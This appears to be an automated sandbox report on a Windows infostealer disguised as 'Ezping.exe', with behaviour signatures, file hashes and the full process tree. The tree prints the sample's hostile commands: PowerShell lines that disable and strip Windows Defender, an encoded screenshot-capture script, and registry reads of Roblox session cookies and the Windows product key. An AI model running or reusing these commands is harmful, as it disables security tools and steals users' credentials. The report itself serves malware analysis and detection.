Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-09-2024 22:50

General

  • Target

    ez ping/Ezping.exe

  • Size

    5.8MB

  • MD5

    8cfd471e70105ed5968a6e06d981a68f

  • SHA1

    82404cb4d8ea53b922d1cdbc988f17860b735f9e

  • SHA256

    05b1092ed811c5825cb29b66ae20830d14b596f1ed3b07e18b9820a0f5f2a872

  • SHA512

    3a5f2cf5630c7845357f89b8d209db52e83018a8a32944f5e6ad82be530c5c70619d4dddf2d4d918318240309421b08ce57e790f623298eaeff4123031a7114c

  • SSDEEP

    98304:QumDSr7vcRHtJQi9UWvGfqD8WOxfmjaa15uXaDvdCK/blzFS03iw7FwXR6nNet3I:QumD6vcRHvUWvozWOxu9kXwvdbDlA033

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ez ping\Ezping.exe
    "C:\Users\Admin\AppData\Local\Temp\ez ping\Ezping.exe"
    1⤵
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:408
    • C:\Users\Admin\AppData\Local\Temp\ez ping\Ezping.exe
      "C:\Users\Admin\AppData\Local\Temp\ez ping\Ezping.exe"
      2⤵
      • Loads dropped DLL
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3276
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ez ping\Ezping.exe'"
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ez ping\Ezping.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3336
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3264
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:220
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1620
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4072
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3708
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3492
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2868
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:2252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3548
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4116
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1844
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3064
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4800
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4536
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3220
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4600
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1200
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4036
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1300
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0tmit1ae\0tmit1ae.cmdline"
              5⤵
                PID:3300
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABB1.tmp" "c:\Users\Admin\AppData\Local\Temp\0tmit1ae\CSCF9181565AED2466B9ABD6F91C46C738D.TMP"
                  6⤵
                    PID:2456
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3360
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:1184
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3368
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3028
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4248
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1180
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1376
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:744
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:4868
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4132
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                          3⤵
                            PID:1368
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4356
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:4652
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1928
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "getmac"
                              3⤵
                                PID:1420
                                • C:\Windows\system32\getmac.exe
                                  getmac
                                  4⤵
                                    PID:1588
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4082\rar.exe a -r -hp"crisagar123" "C:\Users\Admin\AppData\Local\Temp\ennQS.zip" *"
                                  3⤵
                                    PID:2144
                                    • C:\Users\Admin\AppData\Local\Temp\_MEI4082\rar.exe
                                      C:\Users\Admin\AppData\Local\Temp\_MEI4082\rar.exe a -r -hp"crisagar123" "C:\Users\Admin\AppData\Local\Temp\ennQS.zip" *
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4100
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                    3⤵
                                      PID:1240
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic os get Caption
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4916
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                      3⤵
                                        PID:2244
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic computersystem get totalphysicalmemory
                                          4⤵
                                            PID:3404
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          3⤵
                                            PID:4956
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              4⤵
                                                PID:2232
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                              3⤵
                                                PID:392
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4132
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                3⤵
                                                  PID:2944
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    4⤵
                                                    • Detects videocard installed
                                                    PID:3364
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                  3⤵
                                                    PID:4808
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:728

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                2KB

                                                MD5

                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                SHA1

                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                SHA256

                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                SHA512

                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                6d3e9c29fe44e90aae6ed30ccf799ca8

                                                SHA1

                                                c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                SHA256

                                                2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                SHA512

                                                60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                2e907f77659a6601fcc408274894da2e

                                                SHA1

                                                9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                SHA256

                                                385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                SHA512

                                                34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                1KB

                                                MD5

                                                d4154a892a07b07da27746ed39e8ef5d

                                                SHA1

                                                f45db8a86dd4ff4a76c1929d946507db8594d6a5

                                                SHA256

                                                3ea93c6f19fb845797177d3a4513108e58a2d23def933f68f70fdc7300cbf759

                                                SHA512

